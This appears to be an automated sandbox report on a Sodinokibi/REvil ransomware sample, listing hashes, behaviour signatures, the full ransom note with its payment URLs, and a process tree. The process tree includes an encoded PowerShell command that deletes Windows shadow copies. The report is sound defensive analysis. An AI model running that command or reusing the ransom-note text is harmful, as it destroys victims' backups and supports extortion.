Overview

overview

10

Static

static

10

21eb941fd2...le.exe

windows7_x64

10

21eb941fd2...le.exe

windows10_x64

10

Resubmissions

14-09-2021 08:49

210914-krgqssfdd9 10

13-09-2021 13:07

210913-qcw5tsggfk 10

Analysis

  • max time kernel
    1618s
  • max time network
    1802s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    14-09-2021 08:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe

  • Size

    165KB

  • MD5

    fad3cd9094f43e48c8e5061aeb2d76ed

  • SHA1

    cdeb9d27b479ecd25e0ebcda4cfdcff8b969470b

  • SHA256

    21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3

  • SHA512

    9063789eab4ea880199791d5f66196b513bdb206991e22e7a991dbc47ffb0aa837e1452de7440985adb7f35e38b6ab7d15ebfce64e1ac2e2c91545876326e015

Score
10/10
sodinokibiransomwarespywarestealer

Malware Config

Extracted

Path

C:\ultj009_Wannadie.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension ultj009. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F141245511FBA0A0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F141245511FBA0A0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9ogg/Y0PmJZ+P3zvcusVynpNBNxk8Ka1NRWOjV5PlqSBAC05be9z2h083PFiFcmo KxuSCnjvXUHxuh72saskMInj6feI2sbUnhS9U4lGJqXS+Ug9WDY271ZgBDdJlOFg FpcoNRr8KONBvwwUQ39hmyFVKFiOi6Jo+AavOv/HAZzlWAdtGYtecp9/Q5Ti4j6X ZTNGF0xk+/t/oxlVJmnz9eHwnAtZIVloguNJBMCxPA58tG3GyjGXXlnawJkvueM3 XKw6pelYdCqMnBCFydpG7jUUQB3PFN+UH3zIuxveZTE/CbbpFdkPcp33s7z/5Zhk 7WhBhYixOteeXDOGMUTCf4kx+EirAQS1/c8p9VTpmQUTC/nmT81+5mibJHs7+qOa BM++vJ345Y8LRolhKFCRDSTODfMMGiedLrHQ0NqOFhriew3/NgmLv/zQhnHbeJp7 sHlAxLG27C1HFecuqrWU2ijcYFDWqhBAMhlw5xMx+SNjFKuRO1NNZznOiTmoNxmD ml0hKapcC0/X609uJxD9JGezD3f2liC2YDR+2jdgC0BFAgJ/IOddrfrygUl0Rbjn UHXPKReKaVu+eg9nbzWheCYDf8gmTGUM95nkP0s8aA7lpRrI/LAnJw/FMzHjjHrg Ww1ABw0+DFCPU5l8Yb6vCU/uG6BbVLfWtwtuXNBP+zw7vxdEOWynXm6CDyWlxxl5 BuZs9io1FOIu9nTMbVnazdM5Qzq+IRRx4etuDfhu3tiObQRiIp3S+CWkpT8hiz/Y 90sqhiG13ZViogw1ARw11c718wE1dst3wqJP4N6B4U+oRXfiV5noA14xe11UwyIs 7zlYMmadO3hxqFw8rWDeLfx23AcUbzMmyyZ8mpWuZIX4RIluRRxJsnh04Y7/RZJv 4rcqggKhcKAEocVCZymwFaiV1wjiKCOVfnpDYKyWU7IGz7sjil1pshwjPWOyxL52 jNuBa1j7u+B+7P49iTRVJNQ+zBMKe87F2t7Z6nDYg7ITjJXeZaw5w6r4Kbylee4k ChecbbrPKESERGjFsmnmJLjGSJ1J9vNc8+bP3VS9kxa6BfSPihY+XtbGPep2I/2K 7aYJjIfgh/XG6skErtr9uNDYe3jKqzFyI35LpK6qGC9o27irilpghHwgVMW+7cFk i5jicQDoAg/6hICZVVU= Extension name: ultj009 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F141245511FBA0A0

http://decryptor.top/F141245511FBA0A0

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:788
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1972

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/552-54-0x0000000000000000-mapping.dmp
      Download
    • memory/552-55-0x000007FEFBC21000-0x000007FEFBC23000-memory.dmp
      Filesize

      8KB

      Download
    • memory/552-56-0x000007FEF2DC0000-0x000007FEF391D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/552-57-0x0000000002320000-0x0000000002322000-memory.dmp
      Filesize

      8KB

      Download
    • memory/552-59-0x0000000002322000-0x0000000002324000-memory.dmp
      Filesize

      8KB

      Download
    • memory/552-58-0x000000000232B000-0x000000000234A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/552-60-0x0000000002324000-0x0000000002327000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2044-53-0x0000000076391000-0x0000000076393000-memory.dmp
      Filesize

      8KB

      Download